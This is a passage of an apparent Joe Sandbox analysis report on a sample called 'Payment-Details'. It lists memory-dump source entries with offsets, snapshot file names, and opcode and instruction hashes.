                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 80d2e91396f9abd2f6c59d56e5bc35b92ecd5ac0ece07685dc5955d352292c6e
                                        • Instruction ID: 8dbad58342c17a18bae10de17e6b5c29e3bbd6bc2cf5d8395bcb3b7975f7e758
                                        • Opcode Fuzzy Hash: 80d2e91396f9abd2f6c59d56e5bc35b92ecd5ac0ece07685dc5955d352292c6e
                                        • Instruction Fuzzy Hash: 2E9147B0E11218CFDB50CFA4D855BAEBBB1FB49300F10916ADA49A7352CB785986CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 374768be07fc49f1a5f64fbb05eb02cb32b6dc97fb85f3e83775d31846e5c198
                                        • Instruction ID: 511f1850b67f920b4435f055f262f698d2295771071aa2c1f1207f432ca1b28a
                                        • Opcode Fuzzy Hash: 374768be07fc49f1a5f64fbb05eb02cb32b6dc97fb85f3e83775d31846e5c198
                                        • Instruction Fuzzy Hash: 15519BB07042019FDB15AB74C89462EB7A6EF8A300B24896DD846DB3A5DF35DC06CBA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 71c66596b7295bb2408ac66774a6eb1ffb0959ff31ee4ea50a2e590401b3df8f
                                        • Instruction ID: 72d318e91e56c7f97e003d03fedd27641618b1abea80430ad7c163ca52f7b2fa
                                        • Opcode Fuzzy Hash: 71c66596b7295bb2408ac66774a6eb1ffb0959ff31ee4ea50a2e590401b3df8f
                                        • Instruction Fuzzy Hash: 298135B4E10218CFDB50CFA4D855BAEBBF1FB49300F10916ADA49A7352D7789982CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0bdd7d4a1668830d7ba05995538ec4850f89312c150177dec071f4aeb3ca18e2
                                        • Instruction ID: 265e325664306c0d03323b5842a0be53fd055ccb911044f9ee630ae4be0cbe68
                                        • Opcode Fuzzy Hash: 0bdd7d4a1668830d7ba05995538ec4850f89312c150177dec071f4aeb3ca18e2
                                        • Instruction Fuzzy Hash: 3D51E330B042069FDB05ABBD9854A6FBBEBFFC8321B158429E51ADB395DF709C018791
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 265fb3b717e327ee00203febcb10dc336b717f0c2a918f08f40d6b94ddd18f23
                                        • Instruction ID: 717eb6fe5446c7437d9be69b72ce1f2bd5798ba5d7d1349ca3f6b75adb8649ad
                                        • Opcode Fuzzy Hash: 265fb3b717e327ee00203febcb10dc336b717f0c2a918f08f40d6b94ddd18f23
                                        • Instruction Fuzzy Hash: D171CEB0D05209CFDB04CFA9D948BAEBBFAFB89304F10812AD515B7250DB785A85CF51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6367fa1a4bc77e9642cc6e421389d0cd9ec448d122f0e0f92bec3aece0431a5a
                                        • Instruction ID: 631abd6092d18e45227ee22448a02e1f367d5d1fcbd4b01c3a115bfd3137187c
                                        • Opcode Fuzzy Hash: 6367fa1a4bc77e9642cc6e421389d0cd9ec448d122f0e0f92bec3aece0431a5a
                                        • Instruction Fuzzy Hash: 907158B1D11218CFDB50CFA4D855BEEBBB1FB4A300F1091AACA49A7352C7785986CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d5e4bfe18d594fcecdde0c0a1a569b8598567c9e95d572276e5a1fcbd62cb0fa
                                        • Instruction ID: 501fa61efa92cfa4f00f79dd89db9b8f209963cad5f7a2a228fa93ec41c1050b
                                        • Opcode Fuzzy Hash: d5e4bfe18d594fcecdde0c0a1a569b8598567c9e95d572276e5a1fcbd62cb0fa
                                        • Instruction Fuzzy Hash: CC7166B0D10218CFDB50CFA4D855BAEBBB1FB49300F109069DA49A7352C7789D86CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0d279583f24d947daa63ac98cc33dcdc0d748e49cb11a125180c5b6b81e579bc
                                        • Instruction ID: 53e90f6d7116f4a0c656549646e1c8ed2fc28865b2031851e5fb439f3d32c0b3
                                        • Opcode Fuzzy Hash: 0d279583f24d947daa63ac98cc33dcdc0d748e49cb11a125180c5b6b81e579bc
                                        • Instruction Fuzzy Hash: 835130B0E15209CFDB04CFA9C5587EEFBF9BB8A310F1092AAC529B3251D3350A45CB54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b4528667d04917878cfad897ac746102a5220712fca4ffbbdd458469f024b6c
                                        • Instruction ID: 830e9ee42e415d747622b55172c48ba4d669ac38f40f04c0b047acf1c73a7dbb
                                        • Opcode Fuzzy Hash: 1b4528667d04917878cfad897ac746102a5220712fca4ffbbdd458469f024b6c
                                        • Instruction Fuzzy Hash: CE51D471A006168FCB11CF68D484AAAFBB5FF89320B15C296E9599B341D730F892CBD4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • Opcode Fuzzy Hash: fbde9738da19ac6b63df6e837bc3e4f2e5128e8f6b66a8d8e33972180cbb1d23
                                        • Instruction Fuzzy Hash: DC41F3B1D00309DFDB20DFAAC984ACDFBB5BF48711F65802AD508AB250D7756A86CF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e2ca881a13ea8ea197bdee2f3693f6013a80afbbcea9526801096d5f6e963ec7
                                        • Instruction ID: 8015239b18290ad1135fdd0cdece6eaeb8d331745a33677eb8ad9cee75ea4090
                                        • Opcode Fuzzy Hash: e2ca881a13ea8ea197bdee2f3693f6013a80afbbcea9526801096d5f6e963ec7
                                        • Instruction Fuzzy Hash: 894115B4E1420ACFDB04CFAAD8457AEBBF6FB89300F108065D919A7355E7785981CFA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e0570a46bd6398e638f32e167c0f2e576a3973c08f489cd5a5baaa08aecd12d
                                        • Instruction ID: 3c3e0e4b5bd5f982401415f3a655c50f21841d65cd102a355a535335ae904b6e
                                        • Opcode Fuzzy Hash: 1e0570a46bd6398e638f32e167c0f2e576a3973c08f489cd5a5baaa08aecd12d
                                        • Instruction Fuzzy Hash: 4C41E3B4A11229CFEB24DB24C891FA9B7B1FF59310F1041D9EA09AB391D631ED81CF50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 34b65b6819eaecae156798feafa07911bdf6420b6d57804a33bcfeb5ccf60ebd
                                        • Instruction ID: 2e8df80b52de90a0b0db538150373240a40cfc466d821b0c02d61498a65f5cb6
                                        • Opcode Fuzzy Hash: 34b65b6819eaecae156798feafa07911bdf6420b6d57804a33bcfeb5ccf60ebd
                                        • Instruction Fuzzy Hash: 03213C75304206AFDB049F69D844AAEBFABEFC9320B54813AE908CB351DF728C15C790
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 24e25042541309aa82b597c8960293010e2e3c6ae761099be50f60a09a0740a4
                                        • Instruction ID: 700d41958ba317346bc1a9bc8626182ce6b47a6dd3ed5cbe3e61a8c4010363a3
                                        • Opcode Fuzzy Hash: 24e25042541309aa82b597c8960293010e2e3c6ae761099be50f60a09a0740a4
                                        • Instruction Fuzzy Hash: 6A318475B00105EFCF049FA4C854A59BBBAFF8C310B1541AAEA099B361DB31EC52CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8ff6babd3257165bbca4817c60d77e7038be28307bf0a0845902ab975be9e2d0
                                        • Instruction ID: 171a4e956c4619cb2bc2e4d795d45bd74f80352f461ff1b0ef0e24d5b067939f
                                        • Opcode Fuzzy Hash: 8ff6babd3257165bbca4817c60d77e7038be28307bf0a0845902ab975be9e2d0
                                        • Instruction Fuzzy Hash: F93106B0D25209CFDB00CFA9D948BEEBBF6EB89300F50806AD914B7251D3755984CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f1032369675a6f705fa89a3e802eebffbfb433ba7c7e0c1406ee4d40d9c8fec6
                                        • Instruction ID: fbeee4895adcf846ab90d8367bce3d11fed6d121cfc7db0b41fcb8ccfb1d301f
                                        • Opcode Fuzzy Hash: f1032369675a6f705fa89a3e802eebffbfb433ba7c7e0c1406ee4d40d9c8fec6
                                        • Instruction Fuzzy Hash: 3831C1707103069FDB00DF78E8557AEBBEAFB89304F008669D449CB685DBB569058BE1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 60631c2da6edffd87b79fcbf5e24c30d47310f5a487448524531c3ac323e3727
                                        • Instruction ID: ffe96b5fd54f4cac345c76a5d12416434bb9064a21ad9d431de2f2735f263d7c
                                        • Opcode Fuzzy Hash: 60631c2da6edffd87b79fcbf5e24c30d47310f5a487448524531c3ac323e3727
                                        • Instruction Fuzzy Hash: BC41D2B4E18228CFDBA4CFA8D994BE9B7B5AB4A300F5081E9D50DA7340DB745E84CF11
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4bd46f1e96d736b72d8df8296370be0c51e284484d5832a15c7725de4224407
                                        • Instruction ID: 67380f0ec757cd0f45d55aca2ed034e43d4b0820d5ac3efc18b368d48b9792ff
                                        • Opcode Fuzzy Hash: a4bd46f1e96d736b72d8df8296370be0c51e284484d5832a15c7725de4224407
                                        • Instruction Fuzzy Hash: A431A130B0054AABDF15EFAAC8546ADBAFBAFD4310F1C446DE109E7342DB3099428B45
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 852a8c838f1e27e28c780965ca34112f400de169d0eb61ccdbb2eb6b8cb2b77e
                                        • Instruction ID: e8328db00587fb738b3a49f99e89f273aa7c16ebcc44eaa773c9e4548485df21
                                        • Opcode Fuzzy Hash: 852a8c838f1e27e28c780965ca34112f400de169d0eb61ccdbb2eb6b8cb2b77e
                                        • Instruction Fuzzy Hash: BF31F7B5E112499FCB04CFA9D894AEEBBF1EF49300F108166E915B7360DB70A941DF60
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8b726e3d171eae4c71a20679d3f1cfedfcfd40ec11dd70aaa4cab33bf69dab2d
                                        • Instruction ID: 4060d1d30d3cf43c9685eaf0058797a9d3ee3347dcb1d6a716eaf4127c913002
                                        • Opcode Fuzzy Hash: 8b726e3d171eae4c71a20679d3f1cfedfcfd40ec11dd70aaa4cab33bf69dab2d
                                        • Instruction Fuzzy Hash: B731E2B4E60209CBDB44CFAAD844BAEBBF6FB89300F108065D919A7354D7785981CFA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693466177.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7510000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b4533247e70e386bc1084c5852bf5ae819b135d347c6ed421be5aa51546c10d
                                        • Instruction ID: f80914a3056df260fa1b8f7e9230856f7bd59b173e4e2f00dec02301f42e73e6
                                        • Opcode Fuzzy Hash: 1b4533247e70e386bc1084c5852bf5ae819b135d347c6ed421be5aa51546c10d
                                        • Instruction Fuzzy Hash: F521B7723046618FE3248A69D449696BB99FFC2321B19817BE58DC7291CB31E803D751
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 534c4694c91c329d86d5a394911a4e6ffecd2d688de6066073862e6a1dcfe0a4
                                        • Instruction ID: 5603cd81ce218c9da03197b739cb76fa42a24f4a7eaf0feeb27994a92ace1072
                                        • Opcode Fuzzy Hash: 534c4694c91c329d86d5a394911a4e6ffecd2d688de6066073862e6a1dcfe0a4
                                        • Instruction Fuzzy Hash: AC2127713043049FD705EBB9D8405AEBBEAEFC620075085AAE809CF355DF349D0587E2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8514f4934f5012af677159082f7e498d7cd14716acfdfa45b5daf4cd3931149f
                                        • Instruction ID: 3b10643a45f57fb5361494641c6d993ebe5fec9f4fe2f6cc4661533d5eb4cac7
                                        • Opcode Fuzzy Hash: 8514f4934f5012af677159082f7e498d7cd14716acfdfa45b5daf4cd3931149f
                                        • Instruction Fuzzy Hash: 7521C5B0B10256DFCB14AB64C4A46AEB7EBBFC9710F244019D406DB394DF745C06D781
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9825c8fd63e5a00d0362eecaa49d869b105200ef69530e1f2dcf23877ac93c71
                                        • Instruction ID: 0ff333e84805c4446d4d33784e970529237bd06a3f93fe9d1961e159f0d2f20b
                                        • Opcode Fuzzy Hash: 9825c8fd63e5a00d0362eecaa49d869b105200ef69530e1f2dcf23877ac93c71
                                        • Instruction Fuzzy Hash: 52318430B0014A9BDF15EFA9C8546ADBAFBAFD4310F18446DE509E7352DF7059428B81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 164e27bba613c1e1ba48f658d06e3ae85064fe5c72c2ef33220b7b7b086654f6
                                        • Instruction ID: 978f3603b10036c0f68a0d0d0cdd71de9c89cf23b7d2d5e1b9c6d2f075b93d53
                                        • Opcode Fuzzy Hash: 164e27bba613c1e1ba48f658d06e3ae85064fe5c72c2ef33220b7b7b086654f6
                                        • Instruction Fuzzy Hash: 7E3115B0E2424ACFDB04CFA9D8447EEBBF1BB8A710F44806AD814B3254D7744A84CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 75f04a9d3f7d4db72ecbc4a116677c9c6e373792e40f81246e47875b23312f98
                                        • Instruction ID: 1dbc124468b90152463af90a9d422529a0fe40535891816dd4ffdeb939ce2436
                                        • Opcode Fuzzy Hash: 75f04a9d3f7d4db72ecbc4a116677c9c6e373792e40f81246e47875b23312f98
                                        • Instruction Fuzzy Hash: 7D31F2B4A14209DFDB00CFA8D948BEDBBB2FB49710F5080A5E904A7361D375AA84CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dc5e313543f4a623e15552b810020b425ad342b319e5bb98d369410b861b8989
                                        • Instruction ID: 0bc811201a8a283f2d57de1c9040fac5676bea12d93772dbe861a6c7db95cc87
                                        • Opcode Fuzzy Hash: dc5e313543f4a623e15552b810020b425ad342b319e5bb98d369410b861b8989
                                        • Instruction Fuzzy Hash: B5311874E01209DFDB09DFA9D8546EEBBB2FF89310F10806AE916A7360DB305944CBA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9d43ee34083db7bf82f6950a0e058402fe6b2c03d0cbac2670904be7a86caf86
                                        • Instruction ID: 34f7aebe5985b488f1dd871d91eeb4fb8b6dffdb6df7a2316f1183c3a70c5cdc
                                        • Opcode Fuzzy Hash: 9d43ee34083db7bf82f6950a0e058402fe6b2c03d0cbac2670904be7a86caf86
                                        • Instruction Fuzzy Hash: 7D3124B0D2020ACBDB04CFA9D8447EEBBF2FB89710F448169D814B3254D7744A45CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eeea89e22a486fe0acdb060c2db7a7ddcf0e9d82794c77eb4c546bd5f83d29ae
                                        • Instruction ID: add33ff7173c20c717ff187eb523d18e108b9ae2d15ee055b19e79a336b4059f
                                        • Opcode Fuzzy Hash: eeea89e22a486fe0acdb060c2db7a7ddcf0e9d82794c77eb4c546bd5f83d29ae
                                        • Instruction Fuzzy Hash: 2C314AB5E242099FDB44CFA9D845AEEBBF5FB4A300F00902AD945B7340D7745945CFA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3da7b84c89bc767c4289fd636129347d216b8cd60124056001a430e7180264a4
                                        • Instruction ID: d1f40177343a2af34b0ac404397c59cd22203761d50c7cad465efb74d4ddb2df
                                        • Opcode Fuzzy Hash: 3da7b84c89bc767c4289fd636129347d216b8cd60124056001a430e7180264a4
                                        • Instruction Fuzzy Hash: 263126B0922119CFDB24CF68D889BADBBF6FB4A700F909495D809A3251DB759C85CF21
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6905d942dc6387e8fa8b0ee36ff4aa66c7705076cfb885266b309f8ece7add70
                                        • Instruction ID: 0bbc8e9ce798e3ea6b3fb83bed415f14b5302b10ca422b95a54bc080c306b752
                                        • Opcode Fuzzy Hash: 6905d942dc6387e8fa8b0ee36ff4aa66c7705076cfb885266b309f8ece7add70
                                        • Instruction Fuzzy Hash: 98313570D00249EFDB14CFAAD484ADEBFF5AF48710F24842AE948AB350DB359945DFA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93817e905f62b10911c1821a12b5421bc39b90aa54fa61b7b38176ed3bc677fc
                                        • Instruction ID: 0d19541f8e2a861036f7bfb8078f3429566f8caab75adbc9a2e592c91225942f
                                        • Opcode Fuzzy Hash: 93817e905f62b10911c1821a12b5421bc39b90aa54fa61b7b38176ed3bc677fc
                                        • Instruction Fuzzy Hash: AC315970D00249EFDB14DFAAD580ADEBFF5AF48310F24842AE548AB350CB359945DF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4c5d2b5cbcae43e834b6a8e0f426aa856510ca72becda1022359fa07f3b373ee
                                        • Instruction ID: 1cb138410f75f43b6124bbb1821f4ed1e2742787125a7c6f34c4b06ac28f80ad
                                        • Opcode Fuzzy Hash: 4c5d2b5cbcae43e834b6a8e0f426aa856510ca72becda1022359fa07f3b373ee
                                        • Instruction Fuzzy Hash: DA21AD71A083059FC710DF79D84859BFBEAFF84214B1584AED60ADB351EB71A8098BA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d7443272e54baa659f89584caf8b966998decce27d941144b95719e6d18a2cbd
                                        • Instruction ID: c9651160420f5e76fb321e07838891004f0b7755912f9a510bbaf65e5107b8a4
                                        • Opcode Fuzzy Hash: d7443272e54baa659f89584caf8b966998decce27d941144b95719e6d18a2cbd
                                        • Instruction Fuzzy Hash: 02315CF5E14209DFCB80DFA4D845BEEBBF9FB4A300F105066E545A3251D7749A80CBA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7cbcd4fe3cae3bc10178a82b096ac69ddf9f7ff50cdc89880d6cc12c60855b7b
                                        • Instruction ID: 37fcf95c21466c05c7f8a2bc53f7fc135b6ee465de6d0a57044a3b0608b9900c
                                        • Opcode Fuzzy Hash: 7cbcd4fe3cae3bc10178a82b096ac69ddf9f7ff50cdc89880d6cc12c60855b7b
                                        • Instruction Fuzzy Hash: BE3127B4E24209CBDB44CFA9D844BEEBBF9FB49300F00902AD945B7240C7745985CFA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b5efa6cf3e4de98e6061de059464e41d41fa159205126dcb4288ddea7d10479
                                        • Instruction ID: 833543b1b41c8505bf5a365a660b1edd973f4bdb691fc23ac2299f09a61169c2
                                        • Opcode Fuzzy Hash: 0b5efa6cf3e4de98e6061de059464e41d41fa159205126dcb4288ddea7d10479
                                        • Instruction Fuzzy Hash: E731F1B0D10219CFDB64DFA9D8987ADBBB6FB89310F5090AAD909A3350EB745D84CF10
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Memory Dump Source
